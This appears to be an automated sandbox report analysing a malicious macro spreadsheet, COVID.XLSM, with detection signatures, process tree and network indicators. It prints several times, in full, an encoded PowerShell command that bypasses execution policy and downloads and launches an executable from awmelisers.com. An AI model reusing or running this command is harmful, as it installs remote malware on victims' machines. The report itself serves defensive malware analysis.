Loading ...

Play interactive tourEdit tour

Windows Analysis Report COVID.XLSM

Overview

General Information

Sample Name:COVID.XLSM
Analysis ID:471900
MD5:c123363068a4651c9c0c6b4e01b35142
SHA1:8de437d8df29c53e9ebb03a797fdbf805c10429a
SHA256:e5e65b70b5497f146609db5c086e997a4b0ab2352b534c9e25d8a10407801d78
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for domain / URL
Document contains an embedded VBA macro which may execute processes
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Very long command line found
Creates processes via WMI
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7044 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cmd.exe (PID: 6408 cmdline: cmd.exe /c 'powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcwBhAHYAZQBfAHAAYQB0AGgACgB9AAoACgBQAFMALQBJAG4AcwB0AGEAbABsAGUAcgBWADIAIAAiAGgAdAB0AHAAcwA6AC8ALwBhAHcAbQBlAGwAaQBzAGUAcgBzAC4AYwBvAG0AIgAgACIAYQBwAGkALwB2ADMALwBhAGMAaAB5AHIAYQBuAHQAaABlAHMALwBjAG8AbgB0AHIAYQBwAG8AbABhAHIAaQB6AGEAdABpAG8AbgAvAGsAdQBsAHQAdQByAGsAcgBlAGkAcwAiACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAIgAgACIAQQB3AG0AZQBsAGkAcwBlAHIAcwAgAFMAZQByAHYAaQBjAGUAIgAgACIAZQB4AGUAIgAgACQARgBhAGwAcwBlAA==' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5860 cmdline: powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcwBhAHYAZQBfAHAAYQB0AGgACgB9AAoACgBQAFMALQBJAG4AcwB0AGEAbABsAGUAcgBWADIAIAAiAGgAdAB0AHAAcwA6AC8ALwBhAHcAbQBlAGwAaQBzAGUAcgBzAC4AYwBvAG0AIgAgACIAYQBwAGkALwB2ADMALwBhAGMAaAB5AHIAYQBuAHQAaABlAHMALwBjAG8AbgB0AHIAYQBwAG8AbABhAHIAaQB6AGEAdABpAG8AbgAvAGsAdQBsAHQAdQByAGsAcgBlAGkAcwAiACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAIgAgACIAQQB3AG0AZQBsAGkAcwBlAHIAcwAgAFMAZQByAHYAaQBjAGUAIgAgACIAZQB4AGUAIgAgACQARgBhAGwAcwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 5860PowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0xf4e:$sa1: -ENC
  • 0x1ec5:$sa1: -ENC
  • 0x1519e:$sa1: -ENC
  • 0x195bd:$sa1: -ENC
  • 0x1a9f5:$sa1: -ENC
  • 0x57975:$sa1: -ENC
  • 0x58f67:$sa1: -ENC
  • 0x9c807:$sa1: -ENC
  • 0xc0e7e:$sa1: -ENC
  • 0xc8663:$sa1: -ENC
  • 0xc959d:$sa1: -ENC
  • 0x11cf92:$sa1: -ENC
  • 0x125c5d:$sa1: -ENC
  • 0x1a2c45:$sa1: -ENC
  • 0x250fd6:$sa1: -ENC
  • 0x2613c2:$sa1: -ENC
  • 0x2621b3:$sa1: -ENC
  • 0x2630c5:$sa1: -ENC
  • 0x157944:$sa2: -encodedCommand
  • 0x157970:$sa2: -encodedCommand
  • 0x15799f:$sa2: -encodedCommand

Sigma Overview

System Summary:

barindex
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAuAEMAbABvAHMAZ

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: awmelisers.comVirustotal: Detection: 7%Perma Link
Source: https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreisVirustotal: Detection: 7%Perma Link
Source: https://awmelisers.comVirustotal: Detection: 7%Perma Link
Machine Learning detection for sampleShow sources
Source: COVID.XLSMJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.729401670.000002E1FB280000.00000004.00000001.sdmp
Source: global trafficDNS query: name: awmelisers.com
Source: global trafficTCP traffic: 192.168.2.4:49721 -> 206.81.23.172:443
Source: global trafficTCP traffic: 192.168.2.4:49721 -> 206.81.23.172:443
Source: excel.exeMemory has grown: Private usage: 1MB later: 82MB
Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: powershell.exe, 00000006.00000002.728898346.000002E1FAE50000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.714589062.000002E1E2B11000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.aadrm.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.cortana.ai
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.office.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.onedrive.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://augloop.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://augloop.office.com/v2
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.714589062.000002E1E2B11000.00000004.00000001.sdmp, PowerShell_transcript.675052.5LFBxafq.20210826072919.txt.6.drString found in binary or memory: https://awmelisers.com
Source: powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmpString found in binary or memory: https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreis
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://cdn.entity.
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://clients.config.office.net/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://config.edge.skype.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
